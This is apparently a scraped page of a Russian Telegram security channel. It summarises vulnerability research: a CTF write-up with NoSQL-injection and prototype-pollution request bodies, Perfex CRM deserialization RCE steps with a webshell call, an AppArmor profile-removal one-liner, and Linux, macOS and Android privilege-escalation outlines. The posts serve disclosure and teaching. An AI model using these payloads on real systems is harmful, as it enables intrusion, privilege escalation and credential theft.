Похек

Public

Просмотреть канал

248.6K

353

143.9K

Не можете присоединиться? @poxek

16.8k Участники

Обновлено: May 26, 2026 at 7:42 PM

Похек

All materials published on the channel are for educational and informational purposes only. Мнение автора ≠ мнение компании, где работает автор Чат: @poxek_chat Реклама: @szybnev или https://telega.in/c/poxek РКН: https://clck.ru/3FsVhp

@poxek is a dedicated channel for purposes and szybnev with regular updates in OnlyFans

Рейтинг

Глобальный рейтинг

#15520

-340

Рейтинг по языку

#11330

-291

Рейтинг по категории

#251

-8

Рост участников (Последние 16 дней)

Всего: 16.8K

Рост за 24ч: +241 1%

Последние посты

Похек

16 мая 2026 г., 08:27

ssh-keysign-pwn: читаем privileged FD через kernel race
#linux #kernel #openssh #lpe #sshd

Пока все по привычке смотрят на sshd, проблема прилетела в ядро. ssh-keysign-pwn показывает локальный read primitive: непривилегированный пользователь может успеть забрать file descriptor у привилегированного процесса в момент его выхода.

Что нашли
Qualys зарепортили баг, Linus закрыл его в mainline commit 31e62c2ebbfd 14 мая 2026.

Суть в __ptrace_may_access(): в do_exit() после exit_mm() у task уже mm == NULL, но до exit_files() FD еще живы. В этом окне pidfd_getfd() может продублировать чужой FD из-за слишком мягкого ptrace-check.

Что делает тул
PoC эксплуатирует две цели:
➡️ sshkeysign_pwn ловит ssh-keysign и читает /etc/ssh/ssh_host_*_key
➡️ chage_pwn ловит chage -l и читает /etc/shadow

В README указаны подтвержденные цели: Raspberry Pi OS Bookworm 6.12.75, Debian 13, Ubuntu 22.04 / 24.04 / 26.04, Arch, CentOS 9.

Impact
Это локальная уязвимость, не remote RCE в OpenSSH. Но impact нифиговый такой: для SSH это риск impersonation/MitM до ротации host keys, а /etc/shadow - офлайн-брут паролей.

Классическое "мы же сделали privilege drop" встретилось с реальностью kernel race.

Что делать
Ждать backport/обновление ядра с фиксом. Если PoC уже отрабатывал на хосте - ротировать SSH host keys и сбрасывать/аудировать пароли.

🔗PoC: https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn/
🔗Патч: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a
🔗Новость: https://www.phoronix.com/news/Linux-ssh-keysign-pwn

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

1,040

Похек

16 мая 2026 г., 08:27

📷 Photo

1,150

Похек

16 мая 2026 г., 08:27

📷 Photo

1,250

Похек

16 мая 2026 г., 08:27

Доклад Баланс точности и полноты: ML vs if'чики
#owasp #митап

Последний доклад тоже мне запал в душу, за счет обильного присутствия метрик и очень высокой схожести пути Эээксперементов с WAF и то как я пытался строить Guardrail, не по тупому LLM-as-judge, а с регулярками, ML и уже на последнем этапе может быть LLM. Путь и метрики реально схожие оказались и я для себя подкрепил уверенность, что мыслил в правильном направлении. Фоток с доклада много, советую их сохранить - очень ценная информация для тех, кто с этим ранее не сталкивался, а задача такая будет или уже стоит

Хорошим дополнением было: иметь несколько gold set (промптов или запросов) на которых вы сможете тестить не деградирует ли ваша ML модель или в целом система. Важно иметь именно несколько, иначе вы не заметите деградацию, а метрики будут фейково расти. Эти сеты не должны попадать в обучающую выборку, иначе в них нет смысла. И также стоит делать регресионные тесты, когда на давно отработанных тестах и новых данных, которые вы собираете за время работы сервиса

Спасибо за организацию https://t.me/OWASP_RU

1,340

Похек

16 мая 2026 г., 08:27

📷 Photo

1,140

Похек

27 мар. 2026 г., 13:58

Prototype Pollution → Localhost Bypass

Недавно решал веб-челлендж на НТВ (white-box).
На первый взгляд — максимально простой сервис заметок на Express + Mongo. Но внутри оказалась очень интересная цепочка через server-side prototype pollution, которая приводит к обходу IP-проверки.

1️⃣ Первичный анализ
В коде явно видно ограничение доступа к /flag:
app.get('/flag', (req, res) => {
const remoteAddress = req.connection.remoteAddress;
if (
remoteAddress === '127.0.0.1' ||
remoteAddress === '::1' ||
remoteAddress === '::ffff:127.0.0.1'
)
То есть флаг доступен только при запросе с localhost.
Следовательно, задача — заставить сервер считать наш запрос локальным.

2️⃣ Точка входа
Обращает на себя внимание эндпоинт обновления заметок /update:
await Note.findByIdAndUpdate(noteId, req.body);
Здесь:
- пользовательский ввод (req.body) передаётся напрямую в Mongo
- отсутствует фильтрация операторов ($set, $rename и т.д.)
- нет валидации структуры
Это типичный паттерн, приводящий к NoSQL injection.

3️⃣ Подтверждение NoSQL injection
Решил проверить, можно ли управлять выборкой документов:
POST /update

{
"noteId": {
"$ne": null
}
}
Сервер возвращает все заметки → значит можно управлять Mongo-запросом.
Это даёт контроль над фильтрацией и update-операторами.

4️⃣ Эскалация Prototype Pollution
Следующий шаг — проверить, можно ли выйти за пределы обычных полей.
Использовал $rename, чтобы записать значение в специальный путь:
POST /update

{
"noteId": "ID",
"$rename": {
"title": "__proto__.test"
}
}
После этого приложение начинает вести себя нестабильно.
Данные записываются не в документ, а в прототип объектов это ключевой сигнал.

5️⃣ Что такое Prototype Pollution в данном контексте
В JavaScript при обращении к свойству:
obj.prop
движок ищет его:
- в самом объекте
- затем в prototype (proto)
- далее по цепочке

Если атакующий может записать значение в Object.prototype, его начинают видеть все обьекты.
В данном случае приводит к глобальному изменению поведения:
__proto__.something = value

6️⃣ Поиск точки использования (gadget)
Теперь ключевой этап — найти, где polluted данные используются.
Очевидные варианты не дают результата:
__proto__.remoteAddress
__proto__.ip
Это означает, что remoteAddress не является обычным полем.

7️⃣ Важный момент — getter
В Node.js req.connection.remoteAddress — это не просто значение,
а вычисляемое свойство (getter), которое получает IP из внутренних структур сокета.
То есть важно не само поле remoteAddress, а источник, из которого оно берётся.

8️⃣ Поиск внутреннего источника
При переборе вложенных и внутренних полей:
__proto__.connection.remoteAddress
__proto__.socket.remoteAddress
__proto__._peername.address

рабочим оказывается:
__proto__._peername.address
Это внутреннее поле, из которого Node берёт адрес клиента.

9️⃣ Эксплуатация
Так как /create принимает только строки, сначала сохраняем нужное значение:
POST /update

{
"title": "::ffff:127.0.0.1",
"content": "x"
}

Далее переносим его в прототип:
POST /update

{
"noteId": "ID",
"$rename": {
"title": "__proto__._peername.address"
}
}

Это приводит к:
Object.prototype._peername.address = "::ffff:127.0.0.1"

1️⃣0️⃣ Результат
При обращении к /flag getter использует _peername.address, который теперь берётся из prototype.
req.connection.remoteAddress

Сервер получает данные и считает запрос локальным:
::ffff:127.0.0.1

Итог
➡️ NoSQL injection → доступ к Mongo operators
➡️ $rename → запись в proto
➡️ prototype pollution → глобальное изменение поведения объектов
➡️ использование внутреннего поля (_peername) → обход IP-проверки

Инсайт
Prototype pollution — это не просто “сломать объект”.
Это возможность повлиять на данные, которые используются внутри логики приложения, даже если они не передаются напрямую.

Похек

27 мар. 2026 г., 13:58

📷 Photo

Active Directory Certificate Services (AD CS): инфраструктура и методы обнаружения атак
#ADCS #ActiveDirectory #Kerberos #Misconfiguration #EDR

http://BI.ZONE/ выпустили огромное исследование по AD CS, по сути целый учебник, начинающийся в базовых знаний по архитектуре корпоративной PKI (CA, шаблоны сертификатов, enrollment, trust chain) и включающий подробное описание сценариев эксплуатации от ESC1 до ESC16.

Ключевой тезис труда: AD CS — это implicit Tier-0 актив, фактически «скрытый доменный администратор». При некорректной конфигурации (что повсеместно) атакующий может получить полный контроль над доменом через выпуск доверенных сертификатов, причем без компрометации паролей, LSASS или NTLM/Kerberos-кредов.

♾️Сертификаты — слабое место♾️

Критическая поверхность атаки — Certificate Templates (ESC1–ESC4 и далее):

▪️ESC1 (SAN abuse) — возможность указать произвольный Subject Alternative Name, дает аутентификацию от имени любого пользователя, включая Domain Admin
▪️ESC2 (Any Purpose / отсутствие EKU) — выпуск универсального сертификата, пригодного для аутентификации
▪️ESC4 (ACL abuse) — модификация шаблонов через права (WriteDACL / GenericAll / WriteOwner) с последующим превращением их в уязвимые

Если Enterprise CA интегрирован с AD, выданный сертификат автоматически доверяется для аутентификации (Kerberos PKINIT, smart card logon). Это означает, что сертификат = полноценный credential внутри домена.Причем для эксплуатации чаще всего достаточно низкопривилегированной учетной записи + доступа к уязвимому шаблону.

▪️Дополнительный фактор риска — избыточные ACL на объектах PKI (Certificate Templates, Enrollment Services, NTAuthCertificates и др.), особенно если права выданы группам уровня Domain Users или Authenticated Users.

♾️Специфика атак♾️

Атаки на AD CS практически включены в цепочки злоупотреблений конфигурацией. Получив доступ к одному слабому месту, атакующий может: модифицировать шаблон (ESC4), сделать его уязвимым под ESC1/ESC2, выпустить привилегированный сертификат или аутентифицироваться как Tier-0 пользователь.

Таким образом, один локальный мисконфиг в PKI перерастает в полную компрометацию домена. Эти атаки особенно опасны тем, что они не требуют эксплуатации memory corruption или RCE, плохо детектируются классическими средствами (нет «шумных» действий вроде dump LSASS) и используют легитимные механизмы инфраструктуры (certificate-based auth).

🔗 https://bi.zone/expertise/active-directory-certificate-services/

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

Похек

27 мар. 2026 г., 13:58

📷 Photo

Трансформация рынка интернет-пиратства в России на фоне блокировок и падения выручки
#research #F6

F6 выпустила подробный анализ отечественного рынка интернет-пиратства. Как оказалось, в 2025 году владельцы пиратских сайтов заработали $34,4 млн, что на 5,5% меньше год к году. Это самый низкий показатель за последние десять лет. Пик доходов пришелся на 2018 год ($87 млн) и с тех пор неминуемо падает, как и CPM.

♾️Уходим с сайтов в соцсети♾️

Эксперты связывают падение доходов с падением числа поисковых запросов на пиратские порталы на 5,1%. При этом вырос трафик на легальные онлайн-кинотеатры на 27,6%. Также в 2025 году заблокировано 304,5 тысяч пиратских страниц — больше, чем суммарно за 2022–2024 годы. На фоне всего этого пираты активно осваивают соцсети и видеохостинги как канал распространения пиратского контента. Мессенджеры, наоборот, теряют популярность.

♾️Также пираты♾️

▪️Маскируют URL, вместо названий фильмов используя случайные строки или поддомены
▪️Регистрируют домены, похожие на известные бренды, чтобы выглядеть легитимно
▪️Прячут контент через обфускацию, например, описание фильмов в азбуке Морзе
▪️Используют DLE + AI-рерайт, чтобы обходить фильтры поисковиков
▪️Массово используют дешевые .ru-домены без явной связи с контентом

♾️Сращивание с белым рынком♾️

Согласно отчету, до 89% рекламы на пиратских порталах — легальная, что усиливает «сращивание» с белым рынком. Даже пиратские CDN предлагают вебмастерам выбирать тип отображаемой рекламы в плеере. Например, самый используемый формат рекламы — Content Roll, и во всех изученных пиратских сайтах на нем располагалась только легальная реклама. Количество крупных игроков черной рекламы сокращается, разбавляя пиратские порталы рекламой легальных брендов.

♾️Прогноз♾️

Усиление борьбы с пиратством сохранит ежегодный тренд на снижение прибыли пиратов, но спрос на пиратский контент никуда не денется из-за невозможности просмотра большого количества зарубежных фильмов по причине отсутствия лицензий.

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

Похек

27 мар. 2026 г., 13:58

📷 Photo

👋 63% атак на инфраструктуру начинаются через веб-приложения. И в 98% из них есть уязвимости, которые этому помогают

Эксперты K2 Cloud и Positive Technologies разберут, как устроена современная защита веб-приложений в облаке, и покажут на примерах, как работает PT Cloud Application Firewall.

В программе:
🔵какие атаки на веб актуальны в 2026 году
🔵почему традиционная защита не справляется
🔵как защитить веб-ресурсы и API в облаке

Спикеры:
Анжелика Захарова, руководитель практик 1С и кибербезопасности, K2 Cloud
Всеволод Петров, менеджер продукта PT Application Firewall, Positive Technologies

➡️ https://k2.cloud/events/kompleksnaia-zashhita-veb-prilozenii-ot-uiazvimosti-k-ustoicivosti-1/?utm_source=telegram&utm_medium=cpp&utm_campaign=meetup-2604&utm_term=poxek&erid=2VtzqwJMkuT | 26 марта в 11:00 (МСК)

Ждём CIO, CISO, ИТ- и ИБ-специалистов и всех, кто отвечает за безопасность веб-инфраструктуры.

3,250

Похек

27 мар. 2026 г., 13:58

📷 Photo

Не злите белых хакеров: как одно фишинговое SMS привело к пробиву инфраструктуры фишеров
#fishing #story #white_hat #kotolampy_story

Однажды этичный хакер и исследователь киберпреступности Inti De Ceukelaire из ЕС получил фишинговое сообщение, отправленное якобы от имени банка Argenta. Базовый анализ фишинговой страницы вскрыл ряд банальных недостатков, эксплуатация которых привела к обнаружению еще нескольких примитивных уязвимостей.

В итоге исследователю удалось полностью скомпрометировать админ-панель, получить доступ к данным жертв и инфраструктуре. Также выяснилось, что операторами кампании, предположительно, были 18-22 летние студенты из Марокко и Франции, которые не скрывали результаты своей деятельности в соцсетях.

♾️Как проходил пробив♾️

▪️Автор ввел фейковые данные карты, проанализировал запросы через Chrome DevTools и обнаружил обращения к check-action.php и loading.php. В коде loading.php нашел скрытую ссылку на админ-панель и механизм проверки IP через текстовый файл.

▪️Перешел на админ-панель и выяснил, что сессии привязаны только к IP без дополнительных проверок. Через Burp Suite обошел эту логику, имитируя доверенный источник, и получил доступ с правами администратора.

▪️Внутри панели обнаружил функционал для просмотра экрана жертвы, копирования токенов и отправки уведомлений через Telegram (telegramclick.php). С помощью path traversal удалил его и другие файлы уведомлений, после чего операторы перестали получать алерты.

▪️Затем обнаружил WordPress на том же домене, использовавшийся как фасад. Удалил wp-config.php, запустил мастер установки и получил административный доступ.

▪️Напоследок, изменил код фишинговой страницы, из-за чего работала только для IP из Марокко.

Внутри инфраструктуры исследователь обнаружил крайне примитивную реализацию: данные жертв хранились в текстовых файлах, логи указывали на residential IP из Марокко и один университетский из Франции, присутствовал архив argg.zip с исходным кодом, токенами и личными логами, интерфейс для удаленного управления экраном жертвы и жестко заданные IP для блокировок.

🔗 https://inti.io/p/how-i-infiltrated-phishing-panels

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

Похек

27 мар. 2026 г., 13:58

pinned a photo

Похек

27 мар. 2026 г., 13:58

📷 Photo

unauth RCE в Perfex CRM через небезопасную десериализацию
#RCE #PerfexCRM #PHP #WebSecurity #AppSec #Exploit

В Perfex CRM обнаружена критическая уязвимость, связанная с небезопасной десериализацией PHP-объектов. Баг позволяет без авторизации добиться RCE и полностью скомпрометировать систему.

♾️Техническая суть♾️

Функция unserialize() в Authentication_model.php без валидации десериализует значение cookie autologin на каждом запросе (через App_Controller). CodeIgniter фильтрует null-байты в строках, но это можно обойти, используя формат сериализации S: с hex-эскейпами (\00). Это позволяет инжектировать gadget-цепочку на базе GuzzleHttp\Cookie\FileCookieJar. В результате десериализация создает объект, который при деструкции записывает файл с произвольным PHP-кодом (webshell), что приводит к RCE от имени веб-сервера.

♾️Эксплуатация ♾️

▪️Сформировать вредоносную сериализованную строку с использованием гаджета GuzzleHttp\Cookie\FileCookieJar: приватные свойства задаются через S:\00..., а имя cookie в SetCookie подменяется на PHP-код вида  (в hex-форме для обхода фильтров)

▪️Установить cookie autologin с этим пейлоадом (в base64 или в исходном виде, в зависимости от клиента)

▪️Отправить любой запрос на сайт

▪️При garbage collection объекта вызывается __destruct() → происходит запись файла (filename.php) с webshell

▪️Запросить созданный файл (например, /filename.php?0=system('id');) → RCE

♾️Статус♾️

Уязвимость публично раскрыта 16 марта 2026, опубликован PoC (включая готовый пейлоад). Есть сообщения о попытках эксплуатации in the wild. Исправлена в версии 3.4.1: вместо unserialize() теперь используется json_decode(), добавлена строгая проверка типов и исключена возможность создания произвольных объектов.

🔗 https://nullcathedral.com/posts/2026-03-16-perfex-crm-unauthenticated-rce-insecure-deserialization/

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

Похек

27 мар. 2026 г., 13:58

CrackArmor: ваш AppArmor не так безопасен, как вы думали
#AppArmor #linux #kernel #LPE

Qualys TRU раскопали фундаментальную дыру в AppArmor - LSM, который включен по дефолту в Ubuntu, Debian и SUSE. Не одну уязвимость, а сразу девять. Баги сидят в ядре с версии 4.11 - с 2017 года.

Корень проблемы

Pseudo-файлы для управления AppArmor-профилями (/sys/kernel/security/apparmor/.load, .replace, .remove) имеют права 0666 - world-writable. Прямая запись от непривилегированного пользователя блокируется проверкой при write(), но open() проходит. Классическая confused deputy: открываем файл, делаем dup2() на stdout, запускаем привилегированную программу - и она пишет от нашего имени. Идеальным прокси оказался su -P (pty mode) - через него можно писать полностью контролируемые байты, включая null bytes. Результат: непривилегированный пользователь загружает, заменяет и удаляет произвольные AppArmor-профили.

Что это дает атакующему

➡️ Снятие защиты: удаление профилей для cupsd, rsyslogd и других сервисов одной командой:
su -P -c 'stty raw && echo -n rsyslogd' "$USER" > .remove

➡️ DoS: загрузка пустого (deny-all) профиля для sshd блокирует все SSH-подключения

➡️ Bypass user-namespace restrictions: загрузка userns-профиля обходит все известные ограничения Ubuntu, включая уже запатченные aa-exec, busybox и LD_PRELOAD байпасы

➡️ LPE до root: через комбинацию Sudo + Postfix. Загружаем AppArmor-профиль, который запрещает определенные syscall'ы для Sudo - создаем fail-open ситуацию, и Sudo отдает root

Уязвимости ядра

Помимо confused deputy, через загрузку вредоносных профилей эксплуатируются баги в парсере AppArmor:

▶️Uncontrolled recursion - stack exhaustion при удалении глубоко вложенных субпрофилей. Kernel panic на x86-64

▶️Out-of-bounds read - чтение 64KB за пределами 8KB kmalloc-буфера. Утечка kernel pointers, обход KASLR. Подтверждено на Ubuntu 24.04.3 и Debian 13.1

▶️Use-after-free в kmalloc-192 slab cache - полная эскалация привилегий, работает даже с включенным CONFIG_RANDOM_KMALLOC_CACHES

▶️Double-free в slab cache от kmalloc-8 до kmalloc-256 - эскалация привилегий, обходит CONFIG_SLAB_BUCKETS

Что делать

Патчить ядро. CVE пока не присвоены: по процессу Linux kernel идентификаторы назначаются через 1-2 недели после попадания фикса в stable release, чтобы дать время на обновление до публичного раскрытия.

Затронуты Ubuntu, Debian, SUSE и производные. Red Hat и Android используют SELinux вместо AppArmor - не затронуты.

🔗 https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt
🔗 https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root
🔗 https://lwn.net/Articles/1062852/

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

Похек

27 мар. 2026 г., 13:58

📷 Photo

Обходим аутентификацию в FreshRSS с «полувалидными» паролями
#FreshRSS #AppSec #bcrypt #AuthBypass

Криптографический алгоритм, используемый в механизме аутентификации FreshRSS, который должен был защищать пароли, в итоге привел к возможности обхода аутентификации. Проблема кроется в особенностях работы bcrypt: при хэшировании он учитывает только первые 72 байта входной строки, игнорируя все последующие символы. Если атакующий знает или угадывает первые 72 байта настоящего пароля пользователя, он может сформировать другой пароль, начинающийся с той же последовательности, но содержащий любые дополнительные символы в конце, и пройти аутентификацию.

Баг затронул только ветку edge и так и не попал в прод, но случай все равно показательный.

♾️Принцип аутентификации♾️

FreshRSS вместо отправки пароля пользователя на сервер в открытом виде использует challenge-response схему, в которой bcrypt применяется на стороне клиента. Клиент сначала запрашивает у сервера nonce (случайное одноразовое значение) и salt1 — первые 29 символов сохраненного bcrypt-хэша пользователя (версия алгоритма, cost-factor и соль).

После этого клиент вычисляет:
// bcrypt hash of password (60 chars)
s = bcrypt.hashSync(password, salt1);

// bcrypt hash of nonce + s
c = bcrypt.hashSync(nonce + s, randomSalt);

Затем отправляет значение c (challenge) на сервер, который проверяет его следующим образом:
password_verify($nonce . $hash, $challenge);

То есть сервер повторно вычисляет bcrypt-хэш для строки nonce + hash и проверяет, совпадает ли он с полученным challenge.

Использование nonce защищает схему от replay-атак. Даже если атакующий перехватит hash и challenge, повторно использовать их нельзя.

♾️Как появилась проблема♾️

В октябре 2025 года в FreshRSS внесли изменения, направленные на усиление криптографической схемы аутентификации. В значение nonce вместо шестнадцатеричного SHA-1 (40 символов) начали использовать шестнадцатеричный SHA-256 (64 символа). Поскольку bcrypt учитывает только первые 72 байта входной строки, при вычислении bcrypt(nonce + s) длина nonce начинает влиять на то, какая часть s (то есть bcrypt-хэша пароля) реально участвует в вычислении.

При коротком nonce часть строки, зависящей от пароля, могла обрезаться из-за ограничения bcrypt, что приводило к тому, что разные значения s давали одинаковый результат при вычислении bcrypt(nonce + s). Это позволяло сформировать альтернативный пароль, который проходил проверку аутентификации, хотя не совпадал с исходным.

После изменения длины nonce поведение bcrypt изменилось: значимая часть s, зависящая от пароля, начала полностью помещаться в 72-байтовое окно, поэтому truncation перестала влиять на результат.

🔗 https://pentesterlab.com/blog/freshrss-bcrypt-truncation-auth-bypass

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

Похек

27 мар. 2026 г., 13:58

📷 Photo

"Управляемый бэкдор" в MAX: разбор вирусного фейка от Liberty
#MAX #разбор

Liberty выкатили тред, где называют CDN-сервер мессенджера MAX "модулем удалённого управления". 148K просмотров. Разберём по-взрослому — без эмоций и маркетинга.

Что реально происходит

В начале марта на http://ntc.party/ и Хабре разобрали сетевой трафик MAX. Нашли модуль HOST_REACHABILITY:
➡️Пингует Telegram, WhatsApp, http://gosuslugi.ru/ и ещё ряд хостов
➡️Тянет IP-адрес из нескольких чекеров
➡️Смотрит статус VPN через Android ConnectivityManager API
➡️Отправляет собранное на http://api.oneme.ru/

Это нашли ребята с Хабра, подтвердили реверсом APK. Вопросы к такой телеметрии — справедливы.

А теперь — фейковая часть

Liberty взяли чужое исследование и докрутили: http://st.max.ru/ — это, мол, "домен удалённого управления, который руководит приложением в вашем смартфоне".

На деле http://st.max.ru/ — CDN для статики. Он указан в документации MAX для разработчиков:

https://dev.max.ru/docs/webapps/bridge — откройте и проверьте сами.

Liberty называют скачанный 1 МБ "размером с целую книгу" команд. Ок, 1 МБ — это действительно объём небольшой книги. Но это и объём пачки эмодзи, иконок и JS-библиотек. Стандартный набор для мессенджера с
мини-приложениями. Если там "команды" — покажите их. Декодируйте. Распечатайте эту "книгу".

Где пруфы?

Если Liberty перехватили 1 МБ "команд управления" — почему не показали содержимое? Декомпилировали трафик? Расшифровали payload? Показали структуру этих "команд"? Ничего. Только "мы делаем однозначный вывод".

Авторы с Хабра реверсили APK, нашли конкретные классы и методы, показали бинарный протокол с MessagePack-сериализацией. А тут — "мегабайт, значит книга, значит бэкдор". Ну ок.

Feature flags = бэкдор?

Liberty пишут: раз модуль включается не у всех — это "управляемый бэкдор". Feature flags используют все: Google, Apple, Telegram, любое приложение в телефоне. A/B тесты, постепенный rollout — обычная инженерная практика, не заговор.

А что вообще может сделать приложение на телефоне?

Тут стоит напомнить базовую вещь. На современных Android и iOS приложение без явно выданных разрешений не может сделать с устройством ничего критичного. Хотите управлять чужим телефоном? Получите Accessibility Service. Хотите блокировать приложения или стирать данные? Device Administrator privileges. Всё это выдаётся руками пользователя с ОЧЕНЬ явным системным предупреждением.

MAX таких разрешений не запрашивает. Можете проверить в настройках прямо сейчас.

И какого бы я ни был мнения о команде MAX — вряд ли у них, как у NSO Group с их Pegasus, есть свой набор 0day-эксплойтов под обе платформы. Чтобы следить за тем, как вы отправляете показания счётчиков арендодателю квартиры))

Комменты из треда — имба

Уровень "расследования" лучше всего видно по комментариям:

➡️"вот что мне ответил чат GPT на это" — @fist_tsif приложил скриншоты ChatGPT. Зачем разбираться самому, если нейросеть рядом.
➡️"@grok что может сделать max на айфоне?" — два человека вместо подумать своими мозгами позвали Grok в комменты.
➡️"Почему нельзя нормальный технический отчёт написать. Вас даже на хабре обоссали бы за такое" — @cozz777. 343 лайка. Комментарий дороже треда.
➡️Один пользователь рассказал историю про FlashGet Kids на телефоне знакомой — приложение для родительского контроля, которое имеет легитимное удалённое управление и блокировку приложений. Причём тут MAX — загадка вселенной.

Итог

Телеметрия в любом приложении вызывает вопросы. Но наброс про "Управляемый бэкдор" — совсем разное. Это фантазия пользователей X, которые не показали ни одного расшифрованного payload.

Похек

25 мар. 2026 г., 11:33

📷 Photo

«Номинальный» one-way trust: пробиваемся на ту сторону через Kerberos referrals
#AD #Kerberos #ActiveDirectory #LateralMovement #RedTeam

Считается, что если между доменами в Active Directory настроен one-way trust, то аутентификация возможна только в одном направлении и атакующий не сможет использовать его для атаки в обратную сторону. На практике доверительные отношения могут использоваться для перемещения по инфраструктуре и дальнейшей компрометации других доменов.

♾️Техническая суть♾️

Когда пользователь из одного домена обращается к ресурсу другого домена, механизм Kerberos referral tickets работает следующим образом: клиент получает TGT в своем домене, после чего KDC выдает referral ticket, который используется для получения сервисного тикета в доверенном домене. В результате Kerberos-инфраструктура между доменами начинает обмениваться тикетами и информацией из PAC, включая SID.

♾️Процесс атаки до боли простой♾️

▪️В домене, который доверяет другому домену (trusting domain), ищем Trusted Domain Object (TDO) и извлекаем из него секрет, используемый для поддержания one-way trust.

▪️Этот секрет соответствует паролю междоменной учетной записи вида TRUST_ACCOUNT в trusted domain.

▪️Используя полученный секрет, атакующий может аутентифицироваться в trusted domain как trust-учетка и получить как минимум уровень Domain Users.
https://offsec.almond.consulting/trust-no-one_are-one-way-trusts-really-one-way.html🔗 https://offsec.almond.consulting/trust-no-one_are-one-way-trusts-really-one-way.html

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

Похек

25 мар. 2026 г., 11:33

📷 Photo

BSCP и с чем его едят? #BSCP #Portswigger #BurpSuite #cert #экзамен Пробные экзамены Перед сдачей PortSwigger настоятельно рекомендуют прорешать, как минимум, один пробный экзамен, который состоит из одного уязвимого приложения, где необходимо получить первичный…

3,620

Похек

25 мар. 2026 г., 11:33

📷 Photo

Закрепляемся в macOS через баги в IPVanish VPN
#IPVanishVPN #macOS #LPE #XPC #PrivilegeEscalation

Приложение IPVanish VPN для macOS содержит критическую уязвимость повышения привилегий, позволяющую любому непривилегированному локальному процессу выполнить произвольный код от имени root. Для эксплуатации достаточно локального доступа к системе, на которой установлен клиент IPVanish.

♾️Технические особенности♾️

Основная проблема заключается в отсутствии аутентификации XPC-клиентов в привилегированном вспомогательном инструменте com.ipvanish.osx.vpnhelper. Любой локальный процесс может установить соединение с этим хелпером и отправлять ему команды.

Уязвимость усиливается двумя дополнительными проблемами:

▪️Параметр OpenVPNPath — указывает бинарный файл, который хелпер запускает от имени root через GCDTask. Значение параметра принимается напрямую из XPC-сообщения без проверки пути или подписи кода, что позволяет запускать произвольные файлы от имени root.

▪️Ошибка проверки подписи кода — хелпер-инструмент проверяет подпись только для исполняемых файлов. Неисполняемые скрипты можно скопировать в каталог, принадлежащий root, после чего хелпер меняет им права и выполняет их через механизм OpenVPN hook --up, создавая дополнительный путь выполнения кода.

♾️Эксплуатация♾️

▪️Создать вредоносный shell-скрипт /tmp/ipvanish_exploit.sh с правами 0644 (неисполняемый), чтобы обойти проверку подписи.
▪️Установить XPC-соединение с com.ipvanish.osx.vpnhelper без аутентификации клиента.
▪️Отправить XPC-сообщение с VPNHelperCommand = VPNHelperConnect, указав параметр
OpenVPNPath = /tmp/ipvanish_exploit.sh.
▪️Установить параметры OpenVPNUpScriptPath и OpenVPNCertificatePath на /tmp/ipvanish_exploit.sh, что приводит к вызову copyHelperTool.
▪️Вспомогательный инструмент копирует скрипт в каталог /Library/Application Support/com.ipvanish.osx.vpnhelper/ пропуская проверку подписи (из-за неисполняемого состояния файла) и затем устанавливает права 0500.
▪️После этого хелпер запускает /tmp/ipvanish_exploit.sh от имени root через GCDTask, а затем повторно выполняет его через OpenVPN hook --up.
▪️В качестве доказательства эксплуатации скрипт может создать файл /tmp/ipvanish_pwned_root.txt принадлежащий root.

🔗 https://blog.securelayer7.net/ipvanish-vpn-macos-privilege-escalation/

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

Похек

25 мар. 2026 г., 11:33

📷 Photo

Поздравляю прекрасных дам с 8 марта!)

3,690

Похек

25 мар. 2026 г., 11:33

📷 Photo

Android без -fstack-check: неограниченная рекурсия через Binder RPC + LPE из shell в system_server
#Android #LPE #stackoverflow#BinderRPC

В Android нативный код системных компонентов компилируется без защиты от stack clash, поэтому при глубокой рекурсии указатель стека может перепрыгнуть guard-страницу и попасть в отображенную память ниже стека. В результате стек фактически продолжает расти за пределами охраняемой области, что позволяет обойти защиту при вызове функций с большим стековым фреймом, например, android::incfs::MountRegistry::Mounts::loadFrom(), где используется локальный буфер ~128 КиБ.

Атакующий из контекста shell может использовать вложенные синхронные Binder RPC, чтобы неограниченно увеличивать глубину стека одного потока system_server. После этого вызывается функция с крупным стековым выделением, что приводит к перезаписи сохраненных данных в stack frame, захвату управления и потенциальному LPE из shell в system_server.

♾️Эксплуатация♾️

▪️Из shell запускаются команды вроде am dumpheap или trace-ipc stop, что приводит к вызову ShellCallback.openFile в system_server.
▪️В реализации openFile рекурсивно инициируются дополнительные shell-команды, углубляя стек до нужного размера.
▪️Ниже текущего положения стека спреятся контролируемые данные (например через Bitmap и IClipboard.setPrimaryClip) в shared memory.
